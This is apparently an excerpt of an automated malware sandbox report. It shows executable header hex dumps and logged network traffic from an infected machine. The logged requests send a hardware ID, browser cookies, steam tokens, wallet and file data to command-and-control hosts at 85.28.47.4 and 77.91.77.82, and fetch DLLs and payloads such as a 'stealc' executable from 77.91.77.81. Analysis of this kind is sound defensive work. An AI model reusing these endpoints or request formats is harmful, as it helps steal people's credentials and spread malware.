00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 17:25:58 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 17:25:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 17:26:00 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 17:26:00 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 17:26:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 17:26:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 17:26:06 GMTContent-Type: application/octet-streamContent-Length: 1940480Last-Modified: Thu, 27 Jun 2024 17:09:49 GMTConnection: keep-aliveETag: "667d9cdd-1d9c00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 17:27:06 GMTContent-Type: application/octet-streamContent-Length: 2462720Last-Modified: Thu, 27 Jun 2024 15:09:50 GMTConnection: keep-aliveETag: "667d80be-259400"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="hwid"660C966839272029741119------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="build"default------GHDAAKJEGCFCAKEBKJJE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIIIJKFCAAECAKFIEHCHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="message"browsers------FIIIIJKFCAAECAKFIEHC--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="message"plugins------BGDAAEHDHIIJKECBKEBA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIDGDAKFHIEHJKFHDHDHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BFIDGDAKFHIEHJKFHDHDContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------BFIDGDAKFHIEHJKFHDHDContent-Disposition: form-data; name="message"fplugins------BFIDGDAKFHIEHJKFHDHD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDAFBKFIECBGCAKECGHost: 85.28.47.4Content-Length: 5571Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIIIJKFCAAECAKFIEHCHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12Z
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHJEBAAEBGDGDBFBGHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="file"------DBKFHJEBAAEBGDGDBFBG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGHHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="file"------JEGHJDGIJECGDHJJECGH--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJDGCGDAAAKECAKKJDAHost: 85.28.47.4Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFIEGIECGCBKFIEBGCAHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BAFIEGIECGCBKFIEBGCAContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------BAFIEGIECGCBKFIEBGCAContent-Disposition: form-data; name="message"wallets------BAFIEGIECGCBKFIEBGCA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDHJJJECFIECBGDGCAAHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 64 66 39 66 62 63 37 38 38 65 38 39 37 61 62 30 37 33 61 63 62 35 33 30 31 61 39 38 33 66 35 36 30 37 64 38 64 63 65 36 66 34 30 66 63 64 39 36 34 36 39 63 61 32 63 62 37 35 64 63 61 30 66 65 35 36 32 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 2d 2d 0d 0a Data Ascii: ------DHDHJJJECFIECBGDGCAAContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------DHDHJJJECFIECBGDGCAAContent-Disposition: form-data; name="message"files------DHDHJJJECFIECBGDGCAA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGCGCFHIEHIDGDBAAEHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 64 66 39 66 62 63 37 38 38 65 38 39 37 61 62 30 37 33 61 63 62 35 33 30 31 61 39 38 33 66 35 36 30 37 64 38 64 63 65 36 66 34 30 66 63 64 39 36 34 36 39 63 61 32 63 62 37 35 64 63 61 30 66 65 35 36 32 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 2d 2d 0d 0a Data Ascii: ------EGDGCGCFHIEHIDGDBAAEContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------EGDGCGCFHIEHIDGDBAAEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EGDGCGCFHIEHIDGDBAAEContent-Disposition: form-data; name="file"------EGDGCGCFHIEHIDGDBAAE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAAHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 64 66 39 66 62 63 37 38 38 65 38 39 37 61 62 30 37 33 61 63 62 35 33 30 31 61 39 38 33 66 35 36 30 37 64 38 64 63 65 36 66 34 30 66 63 64 39 36 34 36 39 63 61 32 63 62 37 35 64 63 61 30 66 65 35 36 32 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 2d 2d 0d 0a Data Ascii: ------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="message"jbdtaijovg------HIDHIEGIIIECAKEBFBAA--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000006001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIIIDGHJEBFBGDHDGIIHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 30 43 39 36 36 38 33 39 32 37 32 30 32 39 37 34 31 31 31 39 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 2d 2d 0d 0a Data Ascii: ------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="hwid"660C966839272029741119------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="build"default------FIIIIDGHJEBFBGDHDGII--
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
